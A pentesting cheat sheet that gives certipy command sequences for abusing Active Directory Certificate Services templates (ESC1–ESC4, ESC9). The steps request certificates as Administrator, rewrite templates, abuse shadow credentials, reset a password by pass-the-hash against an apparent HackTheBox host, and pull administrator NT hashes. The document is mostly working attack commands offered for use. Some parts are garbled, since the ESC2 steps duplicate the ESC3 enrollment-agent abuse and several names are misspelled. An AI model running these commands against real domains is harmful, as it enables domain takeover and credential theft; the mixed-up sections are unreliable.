# Active Directory Certificate Services (AD CS)

#### If we have ports 3268, 3269 open, certificates should be checked!

## Find Vulnerable Certificates

{% code overflow="wrap" %}

```
certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -vulnerable -stdout
```

{% endcode %}

### **ESC1: Misconfigured Certificate Templates**

{% tabs %}
{% tab title="First Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN> -dns <RHOST>
```

{% endcode %}
{% endtab %}

{% tab title="Second Step" %}
{% code overflow="wrap" %}

```
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
```

{% endcode %}
{% endtab %}
{% endtabs %}

### **ESC2: Misconfigured Certificate Templates**

{% tabs %}
{% tab title="First Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
```

{% endcode %}
{% endtab %}

{% tab title="Second Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
```

{% endcode %}
{% endtab %}

{% tab title="Third Step" %}

```
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
```

{% endtab %}
{% endtabs %}

### **ESC3: Enrollment Agent Templates**

{% tabs %}
{% tab title="First Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
```

{% endcode %}
{% endtab %}

{% tab title="Second Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
```

{% endcode %}
{% endtab %}

{% tab title="Third Step" %}

```
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
```

{% endtab %}
{% endtabs %}

### **ESC4: Vulnerable Certificate Template Access Control**

{% tabs %}
{% tab title="First Step" %}
First, overwrite the configuration to make it vulnerable to ESC1

{% code overflow="wrap" %}

```
certipy-ad template -dc-ip <ip> -u <user> -p <pass> -template <templateName> -target <ip> -save-old
```

{% endcode %}
{% endtab %}

{% tab title="Second Tab" %}
Then, request a certificate based on the ESC4 template, just like ESC1.

{% code overflow="wrap" %}

```
certipy-ad req -username <user> -password <pass> -ca <ca_name> -template <templateName> -upn Administrator@<domain> -target-ip <ip> -dns <dns_dc>
```

{% endcode %}
{% endtab %}

{% tab title="Untitled" %}
Get the hash

```
certipy-ad auth -pfx administrator_dc01.pfx -dc-ip <ip>
```

{% endtab %}
{% endtabs %}

## ESC9

{% tabs %}
{% tab title="Step 1" %}
User 1 have GenericWrite to user2, we can get the user2 hash using shadow Crentials because of user's1 GenericWrite

<pre><code><strong>certipy shadow auto -username &#x3C;user1>@&#x3C;domain> -p &#x3C;pass1> -account &#x3C;user2>
</strong></code></pre>

We can also change the password of that user:

{% code overflow="wrap" %}

```
pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"ffffffffffffffffffffffffffffffff":"a091c1832bcdd4677c28b5a6a1295584" -S "10.10.11.41" 
```

{% endcode %}
{% endtab %}

{% tab title="Step 2" %}
In this step, we change the user2 userPrincipalName to Administrator:

{% code overflow="wrap" %}

```
certipy account update -username <user1>@<domain> -password <pass1> -user <user2> -upn Administrator
```

{% endcode %}
{% endtab %}

{% tab title="Step 3" %}
We request the Vulnerable ECS9 Template with the user2

{% code overflow="wrap" %}

```
certipy req -username <user2>@<domain> -hashes <hashb> -ca <ca_name> -template <vulnerableESC9 template name>
```

{% endcode %}
{% endtab %}

{% tab title="Step 4" %}
And finally we get the hash of administrator:

```
certipy auth -pfx adminitrator.pfx -domain corp.local
```

{% endtab %}
{% endtabs %}